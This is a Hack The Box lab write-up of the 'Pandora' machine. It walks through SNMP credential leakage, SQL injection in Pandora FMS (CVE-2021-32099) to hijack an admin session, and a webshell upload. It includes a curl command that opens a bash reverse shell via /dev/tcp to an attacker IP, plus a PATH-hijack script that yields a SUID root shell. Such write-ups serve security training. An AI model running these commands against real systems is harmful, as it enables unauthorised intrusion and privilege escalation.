> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-pandora.md).

# HTB - Pandora

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvML3346dw634HGSswQjz%2Fimage.png?alt=media&amp;token=da8b14b6-381b-4ed5-89ae-1ad243095804" alt=""><figcaption></figcaption></figure>

domain name leaked.

also scanning for know snmp ports resulted in the below&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPfMgND4MPcJi8zUUuykq%2Fimage.png?alt=media&amp;token=befaf228-9bc0-4b41-8a58-1e6e85e9fe6e" alt=""><figcaption></figcaption></figure>

I can use snmp brute to bruteforce the community strings

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FatU8XTqHg8xvoziFWgG4%2Fimage.png?alt=media&amp;token=0bdbdc09-96a5-47cf-9ef6-273399c47bf5" alt=""><figcaption></figcaption></figure>

running snmpbulkwalk leaks the credentials fro daniel.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBhDpHJ7Ffx2SMl8yg7lV%2Fimage.png?alt=media&amp;token=ced935ff-eaa1-4307-9ed1-91538b79e06c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FB93YTiLZ4mGASFT9iA5a%2Fimage.png?alt=media&amp;token=20a33ddb-e89a-48d7-abeb-450dfe69e0a9" alt=""><figcaption></figcaption></figure>

## Shell as Daniel

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGBWUhqAwT51YXiacFWC8%2Fimage.png?alt=media&amp;token=01d1b7d9-fd37-42b3-ac0f-fc85ba8f8f7e" alt=""><figcaption></figcaption></figure>

Successful authentication.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtXquQvQbQaOxhSOflk7V%2Fimage.png?alt=media&amp;token=b2d14ce0-838f-439a-98b8-625c588bf70f" alt=""><figcaption></figcaption></figure>

i need to escalate my privileges to matt.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbXh5M55Uv8BOo5bjebL8%2Fimage.png?alt=media&amp;token=a6b3e065-160e-4ba4-ae9c-f0c0e9ea0bbc" alt=""><figcaption></figcaption></figure>

pandora.panda.htb is listening on port 80 and is running as matt.

i need to port forward it for accessing it as It’s only listening on localhost.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fyd4VDyHnODqsxaOmXDXv%2Fimage.png?alt=media&amp;token=569920cf-f2df-4069-8e12-9bf42e965014" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1IqkGKGJRote1AUOlsjR%2Fimage.png?alt=media&amp;token=b37e118e-0145-4c21-a618-8a3b90af2c6f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJsWaWzG65M1NEE4KyBPm%2Fimage.png?alt=media&amp;token=170b1485-8976-4e2b-bf69-a551802d7000" alt=""><figcaption></figcaption></figure>

it is vulnerable to unauthenticated sqli injection.

An unauthenticated attacker can supply a crafted SQL injection payload via the session\_id parameter to manipulate session data.

### CVE-2021-32099 (SQLi)

i will use sqlmap for this purposes.

```bash
┌──(ajay㉿kali)-[~]
└─$ sqlmap -u 'http://127.0.0.1:8000/pandora_console/include/chart_generator.php?session_id=1'
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLZKJTQiB72Gm1hba3KRq%2Fimage.png?alt=media&amp;token=fc34e700-225d-437e-8727-666ccdfc5f46" alt=""><figcaption></figcaption></figure>

sqlmap confirms it is vulnerable

databases and tables enumeration

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZhX9Dv4DLXyVXOG423fg%2Fimage.png?alt=media&amp;token=a2f1f2be-46ac-4a7a-b243-89563fbc9c71" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUEPq1dkNkik1dqCl9ZQn%2Fimage.png?alt=media&amp;token=2a24a0c8-0e3a-4eec-92a0-40e0d6278e6a" alt=""><figcaption></figcaption></figure>

there is one table called tsessions\_php

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FE4JP0L8KgKZcmv0A2h7p%2Fimage.png?alt=media&amp;token=b72657a6-b91b-4378-bc5c-7325cb6c1f70" alt=""><figcaption></figcaption></figure>

daniel has so many sessions but matt has only one.

i will try to use the session id to login to matt.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIy2yMmRkpAWUO0OU1TGO%2Fimage.png?alt=media&amp;token=d7b064e1-179c-4809-a68a-d0ab58588789" alt=""><figcaption></figcaption></figure>

and it works to give access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfaHIGOhzSJq3dk2ZLZbV%2Fimage.png?alt=media&amp;token=f31d524f-5e59-4580-8935-55bdb41b5934" alt=""><figcaption></figcaption></figure>

the version of the pandora also suffers form authenticated RCE for CVE-2020-5844 (RCE)

### CVE-2020-5844 (RCE)

i need admin access to do anything here.

{% embed url="<https://github.com/l3eol3eo/CVE-2021-32099_SQLi>" %}

`session_id` is used both as the value you're injecting *and* as the literal PHP session ID cookie you'll present afterward. The endpoint checks: the code assigns phpsessionid the value of session\_id, then queries `select * from tsessions_php where id_session=***PayloadHere***`. The UNION SELECT fakes a valid row for whatever `id_session` you pick, injecting serialized session data claiming `id_usuario` = admin.

Pick any string you want to use as your fake session ID  let's use `pwned` as an example. Then craft the URL:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FU57T8Z5ELIyRDAscDdkp%2Fimage.png?alt=media&amp;token=c8f1a863-6e92-4a23-9708-2dff12fcf2c9" alt=""><figcaption></figcaption></figure>

now accessing the pandora fms in new browser results in access as admin.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsMX5YUm2CXxgGb69clon%2Fimage.png?alt=media&amp;token=6de20e43-a16f-4bcc-98e3-b15d62a0ee66" alt=""><figcaption></figcaption></figure>

got to admin tool > file manager

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMjM4TYEjbHrG04dQrXKX%2Fimage.png?alt=media&amp;token=c1ef76f3-5eaf-4461-b9b5-ef2410f9b124" alt=""><figcaption></figcaption></figure>

upload webshell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOB0z1SiHP54lpjmClE42%2Fimage.png?alt=media&amp;token=b9c871ca-32f7-4f2b-83ef-074425ff1294" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7Bco6TA8NjojRWNdZfQz%2Fimage.png?alt=media&amp;token=91ef62fd-3d7e-443e-90f0-dcfb611c0130" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FAxn91KN78Nimhq0R0ds8%2Fimage.png?alt=media&amp;token=425fcdd6-7550-43ea-b11f-4f1d4aa31d00" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FREzk040wy24Pk6XKTidG%2Fimage.png?alt=media&amp;token=963d9374-9fae-4b67-ac1d-887322fe2a93" alt=""><figcaption></figcaption></figure>

clicking on the file downloads but i need a way to access it.

which i can know by knowing where it is stored on the machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2sJi7mi8LVdWZWEPtaH8%2Fimage.png?alt=media&amp;token=2278076b-808c-4b49-80f2-83ae96be8aac" alt=""><figcaption></figcaption></figure>

now i can access it.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fw8i3r8fbipXB8SVgjv4t%2Fimage.png?alt=media&amp;token=0048d86a-b5d2-4dd4-a013-f7afc780f9cd" alt=""><figcaption></figcaption></figure>

## Shell as Matt

```bash
curl 'http://127.0.0.1:8000/pandora_console/images/shell.php?cmd=bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.52/4444+0>%261"'
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8qbmRW3EooEVNro4MzEj%2Fimage.png?alt=media&amp;token=cf06b129-2204-4541-8264-e7163cf8f460" alt=""><figcaption></figcaption></figure>

looking fro suid bit files gives a custom binary file that has suid set.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F04jslYwaKorCyseSh8yd%2Fimage.png?alt=media&amp;token=a32bc999-6423-4a56-b866-69fa1324a774" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6f826ZzHWSsjcHHvVhQX%2Fimage.png?alt=media&amp;token=fa50a260-647c-4827-b757-6b18351df7ef" alt=""><figcaption></figcaption></figure>

So the binary is:

1. **Printing those status messages** — it's a simple C program with `printf` or `puts` calls
2. **Calling `tar`** without an absolute path (just `tar`, not `/bin/tar`) — that's why the error message comes from `tar` itself, not the binary
3. **Trying to write to `/root/.backup/pandora-backup.tar.gz`** — it's backing up something into root's home directory
4. **Failing** because even though it's SUID root, `tar` is being called via `system()` in C which spawns `/bin/sh -c "tar ..."`, and modern shells drop SUID privileges for security.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fx3qmxfCEyykiul64RYi7%2Fimage.png?alt=media&amp;token=a87d6518-d980-492b-8a70-f006ddd559d7" alt=""><figcaption></figcaption></figure>

critically you can also see it calls **`setreuid`** — meaning it properly sets the real UID to root before calling `system()`, so your hijacked `tar` will actually run as root (unlike some boxes where the shell drops SUID). This is a clean privesc.

So the PATH hijack will 100% work.

but first let me get a stable shell

### Writing SSH keys

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fu0HwygNDFshkHqPTEsbt%2Fimage.png?alt=media&amp;token=bb9552a8-6ee7-4fe4-801f-6655fe2c3a13" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fj0dwtLTxSb8jLzINSES7%2Fimage.png?alt=media&amp;token=68f2ff2a-c2dc-48c8-b792-f74510df91f6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXTavSsUc1AKIJXTd9tHb%2Fimage.png?alt=media&amp;token=5ed45229-8d0d-416f-85f4-1fe08f9b2b6b" alt=""><figcaption></figcaption></figure>

```bash
# Rewrite the tar script more explicitly
cat > /tmp/tar << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash
EOF
chmod +x /tmp/tar
export PATH=/tmp:$PATH
/usr/bin/pandora_backup
ls -la /tmp/rootbash
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPzGyXUBXadfZvrji4Tj8%2Fimage.png?alt=media&amp;token=22f152c0-c9d6-4566-ba2f-fe25d61fe20a" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-pandora.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
